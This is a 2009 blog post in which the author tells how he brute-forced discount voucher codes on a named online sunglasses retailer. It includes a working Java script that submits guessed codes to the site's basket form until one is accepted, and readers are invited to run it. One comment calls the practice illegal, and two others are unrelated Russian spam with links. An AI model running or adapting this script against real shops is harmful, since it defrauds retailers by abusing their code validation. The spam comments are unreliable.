Voucher codes and promo wotsits

It’s 2009! Our digital lives are a breeze and online shopping is just one more option to the newly empowered consumer. Right?

I’m sure I’m not alone in finding the process of buying anything a little tedious now:

  1. See something in the shop you like
  2. Decide not to buy it because you don’t know if that’s a good price
  3. You get home and look on the internet
  4. Now you have to poke around a few websites and try to work out which is cheapest when you consider postage and tax etc.
  5. Maybe one of the sites gives you rebate if you go through a referal like quidco
  6. Maybe the site would give a discount if only you had a voucher code

If you ask me, It’s all a pain in the ass.

My brother emailed me yesterday:

Anyway you can crack into this site to find some good discount codes? http://www.designersunglasses.co.uk

BR20 for 20% as expired.

I recognised this. He’s at stage 6 I thought (or at least I would have done if I’d numbered the stages in my head like I have above). He’s googled for a code but only found one that’s out of date.

I started to pen my reply:

I know I work with computers but there’s no way I can find out what the codes are, they’ll all be validated server-side when you try a code…

Then it hit me. Why not just brute force the code? Worth a shot right?

I cobbled together a littler bit of java to try various combinations of 2 characters followed by 2 digits based on the fact that the expired code was BR20 for 20%. The code below uses JWebUnit which is simply a convenience wrapper for HtmlUnit.

Long story short, it found several codes! One of which was for quite a substantial discount. I’m not going to post the codes (don’t bother asking). If you want a code, you’re welcome to run the sourcecode below or write your own. If the voucher code gets posted on the internet, it’ll probably get disabled pretty quickly too.

Has anyone else written similar things? I’m curious to what other approaches people may have taken. I also think it wouldn’t be too hard to make this a generic application that rattles through all possible codes for a user-supplied regex.

My advise to web developers for anything like this would be to introduce a delay after a few invalid guesses and then start doubling the length of the delay with each invalid guess. This would quickly make any brute force technique pretty useless.

[code lang="java"]
import net.sourceforge.jwebunit.junit.WebTestCase;

public class CodeFinderTest extends WebTestCase {

    public void setUp() throws Exception {
        super.setUp();
        setBaseUrl("http://www.designersunglasses.co.uk");
    }

    public void test1() {
        beginAt("/mens_sunglasses/d_g_dd3011-c96785p138605.html");
        submit();

        for (int perc = 20; perc <= 100; perc += 5) {
            for (char firstLetter = 'A'; firstLetter <= 'Z'; firstLetter++) {
                System.out.println();
                for (char secondLetter = 'A'; secondLetter <= 'Z'; secondLetter++) {

                    // generate the next code to try
                    String code = Character.toString(firstLetter)
                            + Character.toString(secondLetter) + perc;
                    System.out.print(code + ",");

                    // basket_campaign_code is the html id of the text field
                    setTextField("basket_campaign_code", code);
                    submit();

                    // if the response didn't say "invalid code" then it must have said something else...
                    if (!getPageSource().contains(
                            "You have entered an invalid code")) {
                        System.out.print("\nWAHOO!: " + code);
                        // lets get greedy and bump up the percentage discount...
                        firstLetter = secondLetter = 'Z';
                        break;
                    }
                }
            }
        }
    }
}

[/code]

10 thoughts on “Voucher codes and promo wotsits”

  1. you know that…

    a) this is illegal

    …and…

    b) your code spills out onto the sidebar

    …right? I’ll let you decide which is more important.

    As for you proposed solution; there was an article somewhere (Coding Horror?) recently about rate-limiting as a security measure. There was a lot of work on that at HP Labs – it’s very “bio-inspired”, and there are many clever techniques for defining and detection “normal” behaviour, and responding to “abnormal” behaviour in an appropriate way. Have a Google for Virus Throttling, and look for anything by Matt Williamson.

  2. Посмотрите на главные возможности сервиса также начните затрачивать всеми преимуществами Дзена. https://okna.pp.ua

    Пластиковые окна (ПВХ) Рехау изготавливаются из поливинилхлорида. Преимущество таких окон – это устойчивость по отношению физическим как и химическим воздействиям. Особые свойства этого материала предоставляют дизайнерам практически неограниченные возможности: разнообразие цветов, форм в свой черед размеров.

    Чаще всего встречаются металлические, пластиковые, тканевые или деревянные образчики.

    К тому же, многие люди очень жирно ценят внешний идея дерева, его признак, экологичность. Оно, в свой черед натуральные ткани, подсознательно кажется людям теплым в свой черед домашним.

    Особенности Нормативные требования Виды Количество оконных створок Способ открывания створок Форма оконной рамы Вид профиля Тип стеклопакета Дизайн Производители Как наметить? Профиль Стеклопакет Уплотнители Фурнитура и аксессуары Как установить?

    Прежде в награду поддернуть что-то для своего дома, изучите внимательно все виды светозащитных жалюзи которые предлагаются на рынке.

    Бесплатный замер в погода обращения (в черте города Санкт-Петербург) включает полный спектр услуг по замеру и осуществляется опытным специалистом.

    ТЮЛИ – это прозрачные ткани, легкие. Могут быть гладкими или иметь узорчатый или сетчатый рисунок.

    Это лишь небольшая финт производителей пластиковых окон, на самом деле их десятки, если не сотни. Какие пластиковые окна легче? Выбирая остекление, следует отдавать предпочтение известным маркам, но при этом обязательно проверять всю документацию — знаменитые бренды густо подделывают.

    Акции равным образом спецпредложения Акции вдобавок спецпредложения помогут значительно сэкономить при покупке пластикового окна. Посмотреть текущие акции

    Оформить оконное пространство после тканевых роллет можно в любом жилом или офисном помещении. Иногда они используются для дополнительного затенения при наличии основных гардин либо в какой степени самостоятельный декор.

    Более подробно о защитных роллетах на окна с ручным управлением можно прочитать здесь, о роллетах с электроприводом здесь.

    Как повесить жалюзи на пластиковые окна: директор по установке

    Матерчатые изделия, в какой степени состоящие из отдельных сегментов, например вдобавок рулонные, обладают большим потенциалом.

  3. В прошлом месяце платформа qiwi приняла нововведения в безопасность и доп. проверок трназакций.
    Это повлияло на большую часть клиентов и не в лучшую сторону.
    Очень многие пользователи системы вынуждены были ожидать проверки транзакций до 2-х дней из-за этих проверок системы безопасности.
    На эту проверку уходило 50% платежей в период с Dec 2019 по Jan 2020.
    Эта проблема выводит систему из определения “мгновенной” и ставит под сомнение комфортность ее использования.
    Многие пользователи начали активно переходить на другие платформы, так как у многих есть нужда в 1000 и более транзакций ежедневно.
    Таким образом платформа затрудняет нормальную работу многих пользователей.
    Данная информация предоставлена информ агентством Петропавловска-Камчатского https://yuzhno-sakhalinsk24.site
    Ждем окончания реформации системы безопасности, а потом необходимо делать какие то выводы и принимать действия в отношении данной платежной системы.
    У кого какие мысли по поводу других платежных систем, делитесь.

Leave a Reply

Your email address will not be published. Required fields are marked *